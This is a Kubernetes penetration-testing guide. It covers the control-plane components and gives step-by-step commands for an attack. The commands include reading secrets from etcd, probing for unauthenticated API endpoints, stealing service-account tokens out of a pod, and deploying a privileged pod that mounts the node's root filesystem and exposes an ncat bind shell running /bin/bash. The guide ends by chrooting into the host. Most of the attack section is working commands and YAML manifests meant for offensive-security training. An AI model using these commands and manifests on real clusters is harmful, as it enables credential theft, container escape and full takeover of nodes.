โ˜ธ๏ธkubernetes pentesting

Kubernetes Pentesting

Theory

Kubernetes Architecture

Understanding the entirety of the Kubernetes architecture [2] will help you analyze its weaknesses. The first component to understand is the control plane. The control plane of Kubernetes is made up of the components listed next.

NOTE The control plane of a system is the plane, or zone, in which the system operates outside of its standard workloads. This zone is responsible for the system's backend and organizes the components that make up the system. The plane a user interacts with for a workload on Kubernetes, such as the web applications hosted on the cluster, is called the data plane.

API Server

The API Server is the heart of the system; it is integral for communication between the Kubernetes nodes and the Kubernetes components.

Etcd

This is a key/value store that contains the database for control plane components. It is a fileless equivalent to the /etc directory in a Unix operating system.
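
In a pentest, if etcd's client port (2379) is ever reachable and you hold valid client certificates, the cluster state it stores can be read directly. The following is a minimal sketch using etcdctl; the endpoint and certificate paths are assumptions:

# List the keys stored in etcd (cluster state, including Secrets)
ETCDCTL_API=3 etcdctl --endpoints=https://<etcd ip>:2379 --cacert=ca.crt --cert=client.crt --key=client.key get / --prefix --keys-only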

kube-scheduler

This is the scheduling system; it maintains the operation of the containers. The kube-scheduler looks at what should be running, how it should be running, and whether it is running, and then ensures those operations execute.

kube-controller-manager

This is a series of controllers that maintain different operating components. Each controller has a specific task, and the manager organizes them.

cloud-controller-manager

The cloud-controller-manager is an abstraction for each cloud, which allows Kubernetes to work across different cloud providers or on-premises systems.

Kubelet

The Kubernetes agent that runs on each node and communicates back to the Kubernetes API Server.

Kube-proxy

A port-forwarding tool that's like SSH port forwarding. This allows the operator of the system to communicate with individual containers that are internally available in the cluster.


Practical

Find Kubernetes API Servers

First Method

  • Certificate transparency reports

  • Brute-forcing DNS entries

  • Information disclosure through people submitting code blocks or samples

Second Method

We can find these same endpoints if we have access to a container that is connected to an existing cluster. The default ports are as follows:

  • Control plane: TCP inbound, 6443, Kubernetes API server

  • Control plane: TCP inbound, 2379-2380, etcd server client API

  • Worker node(s): TCP inbound, 10250, Kubelet API
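
From inside a container, a quick way to check whether these endpoints are reachable is to probe the ports directly. A minimal sketch; the target IP is an assumption and nmap may need to be installed first:

# Probe the default API server, etcd, and kubelet ports
nmap -n -Pn -p 6443,2379-2380,10250 <control plane or node IP>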

Kubernetes Native URIs

  • /version The response may include a keyword like gitVersion, goVersion, or "platform".

  • /api/v1/pods If you get an answer with "apiVersion" and do not see "pods is forbidden," then you have found a critical system issue where unauthenticated users can get to pods.

  • /api/v1/info Same as pods, but this is an additional endpoint to ensure that general-purpose permissions are appropriately set.

  • /ui This is the lesser-used Kubernetes Dashboard project URI, which should never be exposed to the Internet.

Scanners may also be keying into specific text in the HTML that is returned by scans:

  • "Kubernetes Dashboard" This string in the returned HTML could indicate the presence of the Kubernetes Dashboard.

Fingerprint Kubernetes Servers

# Connect to the kubernetes server
curl -v -k <aws kubernetes url>

# Explore API endpoints
curl -v -k <aws kubernetes url>/version

curl -v -k <aws kubernetes url>/api/v1/pods
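
The Dashboard string mentioned earlier can be checked the same way. A minimal sketch; the /ui path being routed on this host is an assumption:

# Look for the Kubernetes Dashboard string in the returned HTML
curl -s -k <aws kubernetes url>/ui/ | grep -i "kubernetes dashboard"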

Hacking Kubernetes from Within

Get AWS EKS Authentication Token

aws eks get-token --profile <name> --cluster-name <name> --region us-east-1 | jq -r '.status.token'
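
The token returned above can be presented to the API server as a bearer token. A minimal sketch; the API server URL is an assumption:

# Use the EKS token as a bearer token against the API server
TOKEN=$(aws eks get-token --profile <name> --cluster-name <name> --region us-east-1 | jq -r '.status.token')

curl -k -H "Authorization: Bearer $TOKEN" https://<aws kubernetes url>/api/v1/namespaces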

Kubestriker

This application allows you to scan, specify a URL, or use a configuration file to attack a Kubernetes environment.

docker run -it --rm -v /home/kali/.kube/config:/root/.kube/config -v "$(pwd)":/kubestriker --name kubestriker cloudsecguy/kubestriker:v1.0.0

python -m kubestriker

Run an Ubuntu-based Container Image
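
If a suitable pod is not already running, one way to start a long-lived Ubuntu pod to work from is shown below (a sketch, assuming you are permitted to create pods and the node can pull the image):

# Start a long-running Ubuntu pod named "bash"
kubectl run bash --image=ubuntu --command -- sleep infinity

Then exec into it: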

kubectl exec -it $(kubectl get pods | awk '{ print $1 }' | grep -v NAME | grep bash) -- /bin/bash

# Get distro info
cat /etc/lsb-release

# System info
uname -a

# List login credential material
ls -la /var/run/secrets/kubernetes.io/serviceaccount/

# Install nmap and netcat
apt update -y && apt install curl nmap ncat -y

Enumeration on Ubuntu Container

# Query the AWS instance metadata service (169.254.169.254) for the local IPv4 address
curl http://<ip>/latest/meta-data/local-ipv4

# Scan for open ports
nmap -n -p1-65535 <Local IP>

# Scan using NSE scripts
nmap -sV -n --script=http-headers,http-title <Local IP> -p1-65535

Attack API Server

There are two ways to approach this:

  • We can move our tools onto the local container. The downside is that we may be caught by any monitoring tools installed in the cluster, such as EDR tools or tools specific to Kubernetes Admission Controller scanning or Kubernetes Container scanning. Sysdig has an open source agent that can provide this type of telemetry. The tools generally will understand how to use the existing credentials in this case.

  • We can move the tokens outside the cluster and then attach to the cluster remotely using those credentials. This is done by using /var/run/secrets/kubernetes.io/serviceaccount/token, ca.crt, and the IP or hostname of the API server, as sketched below.
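
A minimal sketch of this second approach, assuming token and ca.crt have been copied out of /var/run/secrets/kubernetes.io/serviceaccount/ and the API server is reachable on port 6443:

# Authenticate to the remote API server with the stolen service account token
TOKEN=$(cat token)

kubectl --server=https://<api server ip>:6443 --certificate-authority=ca.crt --token="$TOKEN" get pods --all-namespaces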

First Option

This attack will do the following:

  1. Deploy a container with a backdoor listener that executes a Bash shell.

  2. Start it with full host privileges and then mount the host's root filesystem into the container.

Files Needed:

ncat-svc.yml This file exposes the port to the cluster.

apiVersion: v1
kind: Service
metadata:
  name: revshell
  labels:
    run: revshell
spec:
  ports:
  - port: 9999
    protocol: TCP
  selector:
    run: revshell

ncat.yml This is the main deployment script.

apiVersion: apps/v1
kind: Deployment
metadata:
  name: revshell
spec:
  selector:
    matchLabels: 
      run: revshell
  replicas: 1
  template:
    metadata:
      labels:
        run: revshell  
    spec:
      hostNetwork: true
      hostPID: true
      hostIPC: true
      containers:
      - name: revshell
        image: raesene/ncat
        command: [ "/bin/sh", "-c", "--" ]
        args: [ "ncat -nvlp 9999 -e /bin/bash;" ]
        ports:
         - containerPort: 9999
        securityContext:
          privileged: true
        volumeMounts:
        - mountPath: /host
          name: noderoot
      volumes:
      - name: noderoot
        hostPath:
          path: /

Write the Files in the Container

kubectl exec -it $(kubectl get pods | awk '{ print $1 }' | grep -v NAME | grep bash) -- /bin/bash

cd /tmp

cat <<EOF>> ncat-svc.yml

<paste the content here>

EOF

cat <<EOF>> ncat.yml

<paste the content here>

EOF

Once these two files are on the remote server, we will need to download the kubectl binary. Once we have all these pieces on the system, we can then have kubectl apply a new pod to do the following:

  1. The pod will open port 9999.

  2. It will share the host's PID namespace, IPC namespace, and networking (hostPID, hostIPC, hostNetwork).

  3. It will mount the root file system right into the container.

We can then connect on that port to gain access to the container, which has elevated privileges:

# Download a static kubectl binary into the container
curl -LO "https://dl.k8s.io/release/v1.20.0/bin/linux/amd64/kubectl"

chmod a+x ./kubectl

# Deploy the privileged reverse-shell pod and expose its port
./kubectl apply -f ncat.yml

./kubectl apply -f ncat-svc.yml

# Confirm the service is running and note the target IP
./kubectl get svc

# Connect to the listener; commands now run in the privileged container
ncat <IP> 9999

whoami
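
Because the node's root filesystem is mounted at /host inside this pod, a common follow-up (a sketch) is to chroot into it and operate directly on the node:

# Pivot from the privileged container to the underlying node
chroot /host /bin/bash

hostname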

REFERENCES

  • https://kubernetes.io/partners/#conformance

  • https://kubernetes.io/docs/concepts/architecture/

  • https://aws.amazon.com/eks/getting-started/

  • https://microservices-demo.github.io/

  • https://isc.sans.edu/forums/diary/Using+Certificate+Transparency+as+an+Attack+Defense+Tool/24114/

  • https://github.com/coreos/coreos-kubernetes/blob/master/Documentation/kubernetes-networking.md

  • https://istio.io/

  • https://www.github.com/mosesrenegade/tools-repo/